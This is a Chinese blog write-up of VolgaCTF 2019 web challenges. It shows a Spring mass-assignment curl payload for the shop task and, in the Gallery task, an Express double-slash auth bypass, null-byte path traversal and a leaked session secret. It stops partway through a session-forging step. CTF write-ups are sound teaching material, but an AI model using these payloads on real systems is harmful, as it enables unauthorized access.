<!DOCTYPE html>
<html lang=zh>
<head><meta name="generator" content="Hexo 3.9.0">
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="description" content="0x00 前言比赛地址: https://q.2019.volgactf.ru/tasks 时间: 星期五, 三月 29, 11:00 PM (23:00) — 星期日, 三月 31, 11:00 PM (23:00) 0x01 shop 信息泄露 robots.txt-&amp;gt;shop.1.0.0.war 此处我直接使用idea自动对代码进行反编译，来对代码进行审计 漏洞主要存在于buy的路由处">
<meta property="og:type" content="article">
<meta property="og:title" content="VolgaCTF 2019 Qualifier Web">
<meta property="og:url" content="http://zer0yu.github.io/2019/04/03/VolgaCTF-2019-Qualifier-Web/index.html">
<meta property="og:site_name" content="Z3R0YU">
<meta property="og:description" content="0x00 前言比赛地址: https://q.2019.volgactf.ru/tasks 时间: 星期五, 三月 29, 11:00 PM (23:00) — 星期日, 三月 31, 11:00 PM (23:00) 0x01 shop 信息泄露 robots.txt-&amp;gt;shop.1.0.0.war 此处我直接使用idea自动对代码进行反编译，来对代码进行审计 漏洞主要存在于buy的路由处">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://i.loli.net/2019/04/03/5ca43e6e70334.png">
<meta property="og:image" content="https://i.loli.net/2019/04/03/5ca43e9ac1757.png">
<meta property="og:image" content="https://i.loli.net/2019/04/03/5ca43ed8b02d6.png">
<meta property="og:image" content="https://i.loli.net/2019/04/03/5ca43efc015d1.png">
<meta property="og:image" content="https://i.loli.net/2019/04/03/5ca43f204bc89.png">
<meta property="og:image" content="https://i.loli.net/2019/04/03/5ca43f52e73eb.png">
<meta property="og:image" content="https://i.loli.net/2019/04/03/5ca43f8dc3c19.png">
<meta property="og:image" content="https://i.loli.net/2019/04/03/5ca43fab8e34f.png">
<meta property="og:image" content="https://i.loli.net/2019/04/03/5ca43fc400c8b.png">
<meta property="og:image" content="https://i.loli.net/2019/04/03/5ca43ff56b20d.png">
<meta property="og:image" content="https://i.loli.net/2019/04/03/5ca440109c090.png">
<meta property="og:updated_time" content="2019-04-03T08:33:22.672Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="VolgaCTF 2019 Qualifier Web">
<meta name="twitter:description" content="0x00 前言比赛地址: https://q.2019.volgactf.ru/tasks 时间: 星期五, 三月 29, 11:00 PM (23:00) — 星期日, 三月 31, 11:00 PM (23:00) 0x01 shop 信息泄露 robots.txt-&amp;gt;shop.1.0.0.war 此处我直接使用idea自动对代码进行反编译，来对代码进行审计 漏洞主要存在于buy的路由处">
<meta name="twitter:image" content="https://i.loli.net/2019/04/03/5ca43e6e70334.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>VolgaCTF 2019 Qualifier Web</title>
    <!-- styles -->
    <link rel="stylesheet" href="/css/style.css">
    <!-- persian styles -->
    
      <link rel="stylesheet" href="/css/rtl.css">
    
    <!-- rss -->
    
    
      <link rel="alternate" href="/atom.xml" title="Z3R0YU" type="application/atom+xml">
    
</head>

<body class="max-width mx-auto px3 ltr">    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/About/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="https://github.com/zer0yu">Projects</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2019/05/15/how-to-use-afl-fuzz/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2019/04/02/Sunshine-CTF-2019-Web/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://zer0yu.github.io/2019/04/03/VolgaCTF-2019-Qualifier-Web/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://zer0yu.github.io/2019/04/03/VolgaCTF-2019-Qualifier-Web/&text=VolgaCTF 2019 Qualifier Web"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://zer0yu.github.io/2019/04/03/VolgaCTF-2019-Qualifier-Web/&title=VolgaCTF 2019 Qualifier Web"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://zer0yu.github.io/2019/04/03/VolgaCTF-2019-Qualifier-Web/&is_video=false&description=VolgaCTF 2019 Qualifier Web"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=VolgaCTF 2019 Qualifier Web&body=Check out this article: http://zer0yu.github.io/2019/04/03/VolgaCTF-2019-Qualifier-Web/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://zer0yu.github.io/2019/04/03/VolgaCTF-2019-Qualifier-Web/&title=VolgaCTF 2019 Qualifier Web"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://zer0yu.github.io/2019/04/03/VolgaCTF-2019-Qualifier-Web/&title=VolgaCTF 2019 Qualifier Web"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://zer0yu.github.io/2019/04/03/VolgaCTF-2019-Qualifier-Web/&title=VolgaCTF 2019 Qualifier Web"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://zer0yu.github.io/2019/04/03/VolgaCTF-2019-Qualifier-Web/&title=VolgaCTF 2019 Qualifier Web"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://zer0yu.github.io/2019/04/03/VolgaCTF-2019-Qualifier-Web/&name=VolgaCTF 2019 Qualifier Web&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-前言"><span class="toc-number">1.</span> <span class="toc-text">0x00 前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-shop"><span class="toc-number">2.</span> <span class="toc-text">0x01 shop</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-HeadHunter"><span class="toc-number">3.</span> <span class="toc-text">0x02 HeadHunter</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-Gallery"><span class="toc-number">4.</span> <span class="toc-text">0x03 Gallery</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-Blog"><span class="toc-number">5.</span> <span class="toc-text">0x04 Blog</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x05-Shop-V-2"><span class="toc-number">6.</span> <span class="toc-text">0x05 Shop V.2</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index my4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        VolgaCTF 2019 Qualifier Web
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Z3R0YU</span>
      </span>
      
    <div class="postdate">
        <time datetime="2019-04-03T04:59:40.000Z" itemprop="datePublished">2019-04-03</time>
    </div>


      

    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h2><p>比赛地址: <a href="https://q.2019.volgactf.ru/tasks" target="_blank" rel="noopener">https://q.2019.volgactf.ru/tasks</a></p>
<p>时间: 星期五, 三月 29, 11:00 PM (23:00) — 星期日, 三月 31, 11:00 PM (23:00)</p>
<h2 id="0x01-shop"><a href="#0x01-shop" class="headerlink" title="0x01 shop"></a>0x01 shop</h2><ol>
<li>信息泄露 robots.txt-&gt;shop.1.0.0.war</li>
<li>此处我直接使用idea自动对代码进行反编译，来对代码进行审计 漏洞主要存在于buy的路由处，在此处使用了spring mvc的<code>@ModelAttribute</code>。它的作用是从modle中获取一个对象，然后使用用户的请求request来赋值，这就造成我们可以对其中的某些变量进行控制。漏洞类型属于自动绑定漏洞。 从user类中我们看到可以控制balance。(PS:自动绑定漏洞是调用set和get方法的并不是直接操控变量或者数据库值)</li>
</ol>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> Integer <span class="title">getBalance</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">this</span>.balance;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">setBalance</span><span class="params">(Integer weight)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">this</span>.balance = weight;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>而从程序的校验来看如果可以控制balance那么就可以满足校验，从而成功购买flag</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@RequestMapping</span>(&#123;<span class="string">"/buy"</span>&#125;)</span><br><span class="line"><span class="function"><span class="keyword">public</span> String <span class="title">buy</span><span class="params">(@RequestParam Integer productId, @ModelAttribute(<span class="string">"user"</span>)</span> User user, RedirectAttributes redir, HttpServletRequest request) </span>&#123;</span><br><span class="line">    HttpSession session = request.getSession();</span><br><span class="line">    <span class="keyword">if</span> (session.getAttribute(<span class="string">"user_id"</span>) == <span class="keyword">null</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">"redirect:index"</span>;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        Product product = <span class="keyword">this</span>.productDao.geProduct(productId);</span><br><span class="line">        <span class="keyword">if</span> (product != <span class="keyword">null</span>) &#123;</span><br><span class="line">            <span class="keyword">if</span> (product.getPrice() &lt;= user.getBalance()) &#123;</span><br><span class="line">                user.setBalance(user.getBalance() - product.getPrice());</span><br><span class="line">                user.getCartItems().add(product);</span><br><span class="line">                <span class="keyword">this</span>.userDao.update(user);</span><br><span class="line">                redir.addFlashAttribute(<span class="string">"message"</span>, <span class="string">"Successful purchase"</span>);</span><br><span class="line">                <span class="keyword">return</span> <span class="string">"redirect:profile"</span>;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            redir.addFlashAttribute(<span class="string">"message"</span>, <span class="string">"Not enough money"</span>);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            redir.addFlashAttribute(<span class="string">"message"</span>, <span class="string">"Product not found"</span>);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> <span class="string">"redirect:index"</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -i http://shop.q.2019.volgactf.ru/buy --cookie &quot;JSESSIONID=9C636630989A68978E11C28CCAABA31F&quot; --data &quot;productId=4&amp;balance=100000&quot; -L</span><br></pre></td></tr></table></figure>
<p>flag</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">VolgaCTF&#123;c6bc0c68f0d0dac189aa9031f8607dba&#125;</span><br></pre></td></tr></table></figure>
<h2 id="0x02-HeadHunter"><a href="#0x02-HeadHunter" class="headerlink" title="0x02 HeadHunter"></a>0x02 HeadHunter</h2><h2 id="0x03-Gallery"><a href="#0x03-Gallery" class="headerlink" title="0x03 Gallery"></a>0x03 Gallery</h2><ol>
<li>进行信息收集 使用dirsearch收集到如下信息</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">[22:14:44] 301 -  194B  - /js  -&gt;  http://142.93.204.169/js/</span><br><span class="line">[22:18:24] 403 -    0B  - /api/error_log</span><br><span class="line">[22:18:24] 403 -    0B  - /api/</span><br><span class="line">[22:18:24] 200 -   35B  - /api</span><br><span class="line">[22:18:24] 200 -   35B  - /apibuild.pyc</span><br><span class="line">[22:19:20] 301 -  194B  - /css  -&gt;  http://142.93.204.169/css/</span><br><span class="line">[22:20:09] 301 -  194B  - /js  -&gt;  http://142.93.204.169/js/</span><br><span class="line">[22:20:18] 200 -    3KB - /login</span><br><span class="line">[22:20:18] 200 -    3KB - /login.cgi</span><br><span class="line">[22:20:18] 200 -    3KB - /login.html</span><br><span class="line">[22:20:18] 200 -    3KB - /login.jsp</span><br><span class="line">[22:20:18] 200 -    3KB - /login.js</span><br><span class="line">[22:20:18] 200 -    3KB - /login.php</span><br><span class="line">[22:20:18] 200 -    3KB - /login.pl</span><br><span class="line">[22:20:19] 200 -    3KB - /login.rb</span><br><span class="line">[22:20:19] 200 -    3KB - /login.shtml</span><br><span class="line">[22:20:19] 200 -    3KB - /login.py</span><br><span class="line">[22:20:19] 200 -    3KB - /login.srf</span><br><span class="line">[22:20:19] 200 -    3KB - /login/</span><br><span class="line">[22:20:19] 200 -    3KB - /login/admin/</span><br><span class="line">[22:20:19] 200 -    3KB - /login/cpanel/</span><br><span class="line">[22:20:19] 200 -    3KB - /login/cpanel.js</span><br><span class="line">[22:20:19] 200 -    3KB - /login.htm</span><br><span class="line">[22:20:19] 200 -    3KB - /login/oauth/</span><br><span class="line">[22:20:19] 200 -    3KB - /login_admin.js</span><br><span class="line">[22:20:19] 200 -    3KB - /login_admin</span><br><span class="line">[22:20:19] 200 -    3KB - /logins.txt</span><br><span class="line">[22:20:20] 200 -    3KB - /login/administrator/</span><br><span class="line">[22:20:43] 200 -  459B  - /package.json</span><br><span class="line">[22:21:18] 301 -  194B  - /sessions  -&gt;  http://142.93.204.169/sessions/</span><br><span class="line">[22:21:18] 200 -  169B  - /sessions/</span><br></pre></td></tr></table></figure>
<p>查看<code>/js/</code>可以列出当前站点的文件</p>
<p><img src="https://i.loli.net/2019/04/03/5ca43e6e70334.png" alt="3DE72E1C-10EE-467F-9B32-2FFAA471CBD0.png"></p>
<p>由以上信息基本可以判断出目标站点是一个node.js开发的站点</p>
<ol>
<li>源码分析 首先看一下<code>index.js</code>的源码，首先可以看到是基于express框架开发的,<code>${config.apiPrefix}/login</code>,<code>${config.apiPrefix}/logout</code>, <code>${config.apiPrefix}/flag</code>是实现的三个接口，如果想读flag的话，你的session必须是admin</li>
</ol>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> express    = <span class="built_in">require</span>(<span class="string">'express'</span>);</span><br><span class="line"><span class="keyword">const</span> session = <span class="built_in">require</span>(<span class="string">'express-session'</span>);</span><br><span class="line"><span class="keyword">const</span> store = <span class="built_in">require</span>(<span class="string">'session-file-store'</span>)(session);</span><br><span class="line"><span class="keyword">const</span> proxy = <span class="built_in">require</span>(<span class="string">'http-proxy-middleware'</span>);</span><br><span class="line"><span class="keyword">const</span> parser = <span class="built_in">require</span>(<span class="string">'body-parser'</span>);</span><br><span class="line"><span class="keyword">const</span> fs = <span class="built_in">require</span>(<span class="string">'fs'</span>);</span><br><span class="line"><span class="keyword">const</span> app = express();</span><br><span class="line"></span><br><span class="line">config = <span class="built_in">require</span>(<span class="string">'./config'</span>);</span><br><span class="line">auth = <span class="built_in">require</span>(<span class="string">'./auth'</span>)();</span><br><span class="line">config.session.store = <span class="keyword">new</span> store();</span><br><span class="line"></span><br><span class="line">app.use(parser.urlencoded(&#123; <span class="attr">extended</span>: <span class="literal">false</span> &#125;));</span><br><span class="line">app.use(<span class="string">`<span class="subst">$&#123;config.apiPrefix&#125;</span>/*`</span>, session(config.session));</span><br><span class="line">app.use(<span class="string">`<span class="subst">$&#123;config.apiPrefix&#125;</span>/*`</span>, auth.unless(&#123;<span class="attr">path</span>: config.whitelistPaths&#125;));</span><br><span class="line"></span><br><span class="line">app.post(<span class="string">`<span class="subst">$&#123;config.apiPrefix&#125;</span>/login`</span>, <span class="function"><span class="keyword">function</span> (<span class="params">req, res</span>) </span>&#123;</span><br><span class="line">  <span class="comment">/* <span class="doctag">TODO:</span> Implement login*/</span></span><br><span class="line">  res.redirect(<span class="string">'/login'</span>);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">app.get(<span class="string">`<span class="subst">$&#123;config.apiPrefix&#125;</span>/logout`</span>, <span class="function"><span class="keyword">function</span> (<span class="params">req, res</span>) </span>&#123;</span><br><span class="line">  <span class="comment">/* <span class="doctag">TODO:</span> Implement logout */</span></span><br><span class="line">  res.redirect(<span class="string">'/login'</span>);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">app.get(<span class="string">`<span class="subst">$&#123;config.apiPrefix&#125;</span>/flag`</span>, <span class="function"><span class="keyword">function</span> (<span class="params">req, res</span>) </span>&#123;</span><br><span class="line">  <span class="built_in">console</span>.log(req.session);</span><br><span class="line">  <span class="keyword">if</span>(req.session.name === <span class="string">'admin'</span>)</span><br><span class="line">    res.end(fs.readFileSync(<span class="string">'../../flag'</span>, <span class="string">'utf8'</span>));</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">    res.status(<span class="number">403</span>).send();</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">app.use(proxy(config.proxy));</span><br><span class="line">app.listen(config.server.port);</span><br></pre></td></tr></table></figure>
<p>之后看一下config.js文件的内容，可以知道监听的端口是4000，但是未知强求会转到代理端口5000，所以在这儿是可以列目录来读取源代码的。里面还写到了session的签名，以及白名单路由。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> config = &#123;</span><br><span class="line">  apiPrefix: <span class="string">'/api'</span>,</span><br><span class="line">  server: &#123;</span><br><span class="line">    port: <span class="number">4000</span></span><br><span class="line">  &#125;,</span><br><span class="line">  proxy: &#123;</span><br><span class="line">    target: <span class="string">'http://localhost:5000'</span>,</span><br><span class="line">    autoRewrite: <span class="literal">true</span></span><br><span class="line">  &#125;,</span><br><span class="line">  session: &#123;</span><br><span class="line">    name: <span class="string">'SESSION'</span>,</span><br><span class="line">    saveUninitialized: <span class="literal">false</span>,</span><br><span class="line">    secret: <span class="string">';GmU1FSlVETF/vzEaBHP'</span>,</span><br><span class="line">    rolling: <span class="literal">true</span>,</span><br><span class="line">    resave: <span class="literal">false</span></span><br><span class="line">  &#125;,</span><br><span class="line">  whitelistPaths: [</span><br><span class="line">    <span class="string">'/api/login'</span>, <span class="string">'/api/logout'</span></span><br><span class="line">  ]</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="built_in">module</span>.exports = config;</span><br></pre></td></tr></table></figure>
<p>之前还扫描到了session路径，可见session应该是存储在文件中的。而main.js中又有可以请求文件的方法，所以可能我们可以利用这个点来读与一些文件</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">$(<span class="built_in">document</span>).ready(<span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">  year = <span class="built_in">parseInt</span>(location.pathname.slice(<span class="number">1</span>)) || <span class="number">2018</span>;</span><br><span class="line">  $.getJSON(<span class="string">`/api/images?year=<span class="subst">$&#123;year&#125;</span>`</span>, <span class="function"><span class="keyword">function</span>(<span class="params">data</span>) </span>&#123;</span><br><span class="line">    $.each(data, <span class="function"><span class="keyword">function</span>(<span class="params">key, img</span>) </span>&#123;</span><br><span class="line"></span><br><span class="line">      $(<span class="string">'&lt;div&gt;'</span>, &#123;</span><br><span class="line">          class: 'col-lg-3 col-md-4 col-xs-6',</span><br><span class="line">          html: $(<span class="string">'&lt;a&gt;'</span>, &#123;</span><br><span class="line">            href: <span class="string">`/api/image?year=<span class="subst">$&#123;year&#125;</span>&amp;img=<span class="subst">$&#123;img&#125;</span>`</span>,</span><br><span class="line">            class: 'd-block mb-4 h-100',</span><br><span class="line">            html: $(<span class="string">'&lt;img&gt;'</span>, &#123;</span><br><span class="line">              class: 'img-fluid img-thumbnail',</span><br><span class="line">              src: <span class="string">`/api/image?year=<span class="subst">$&#123;year&#125;</span>&amp;img=<span class="subst">$&#123;img&#125;</span>`</span>,</span><br><span class="line">              alt: <span class="string">''</span></span><br><span class="line">            &#125;)</span><br><span class="line">          &#125;)</span><br><span class="line">       &#125;).appendTo($(<span class="string">'#gallery'</span>));;</span><br><span class="line">    &#125;);</span><br><span class="line">  &#125;).fail(<span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span>&#123; location = <span class="string">'/login'</span>;&#125;);</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>
<p>auth.js</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> unless = <span class="built_in">require</span>(<span class="string">'express-unless'</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> auth = <span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>&#123;</span><br><span class="line">  <span class="keyword">var</span> authm = <span class="function"><span class="keyword">function</span> (<span class="params">req, res, next</span>) </span>&#123;</span><br><span class="line">  <span class="built_in">console</span>.log(req.session);</span><br><span class="line">    <span class="keyword">if</span> (!req.session.name) &#123;</span><br><span class="line">      res.status(<span class="number">403</span>).send();</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    next();</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  authm.unless = unless;</span><br><span class="line">  <span class="keyword">return</span> authm;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="built_in">module</span>.exports = auth;</span><br></pre></td></tr></table></figure>
<ol>
<li>tips 在进行下一步测试之前，先提三个tips: (1) Express框架处理路径的时候是不规范的，因此<code>/</code>,<code>//</code>是存在区别的可以用于某些情况下的bypass； (2) PHP的小bug，%00截断（null byte injection）致使file_exists出错进而列目录； (3) session-file-store模块会将session存在json格式的文件中，如果指定session所在的目录，express-session模块将会去对应的目录下取出session信息；</li>
<li>漏洞利用 有了以上的信息，我们首先测试main.js提供的<code>/api/images?year=${year}</code>接口。首先利用第一个tips，express的非规范化路径，绕过auth.js的认证。 <img src="https://i.loli.net/2019/04/03/5ca43e9ac1757.png" alt="2CD29029-253F-4C33-AB17-48ED2554C4D9.png"> <code>//</code>的情况如下，可以看到已经绕过了认证并且应该可以读文件了。 <img src="https://i.loli.net/2019/04/03/5ca43ed8b02d6.png" alt="613A1694-476E-43B2-ABE4-2518DD27D02C.png"> 但是当尝试读取image的时候却出现了如下报错，从错误信息上我们可以得到如下两点信息:首先，绝对路径是<code>/var/www/apps/volga_gallery/storage/app/2019/img/</code>；其次，这是一个laravel框架。<img src="https://i.loli.net/2019/04/03/5ca43efc015d1.png" alt="56CE4CC6-3037-4150-B587-42670A1DC4F0.png"> 其实是我输入的年份没有图片，我修改为2018即得到如下信息，所以确认可以列目录下文件了。 <img src="https://i.loli.net/2019/04/03/5ca43f204bc89.png" alt="4799816A-91C8-483F-94C0-B9949972CF3A.png"> 之前知道后端是采用PHP框架处理，所以我先在2018路径后注入%00，之后成功得到当前目录 <img src="https://i.loli.net/2019/04/03/5ca43f52e73eb.png" alt="24B686AC-603E-4CEE-A0F5-9F411FEE092B.png"> 之后继续查看其它目录信息,最终在<code>//api/images?year=2018/../../../../volga_adminpanel%00</code>路径下找到了session信息 <img src="https://i.loli.net/2019/04/03/5ca43f8dc3c19.png" alt="B4CEB3D9-21DC-4625-9240-3F20EA3B2366.png"> <img src="https://i.loli.net/2019/04/03/5ca43fab8e34f.png" alt="BC67D40F-5399-4913-81D4-AE7364663FB9.png"> <img src="https://i.loli.net/2019/04/03/5ca43fc400c8b.png" alt="659D85A9-3C60-4956-AC7A-55BCF3E3784E.png"> 但是我们并不能直接读取这个文件，因此就用到第3个tips，直接在cookie字段这个路径写入。但是这里是设计session的计算问题的。我在本地搭建了一个环境，修改了部分代码。 node_modules/express-session/index.js</li>
</ol>
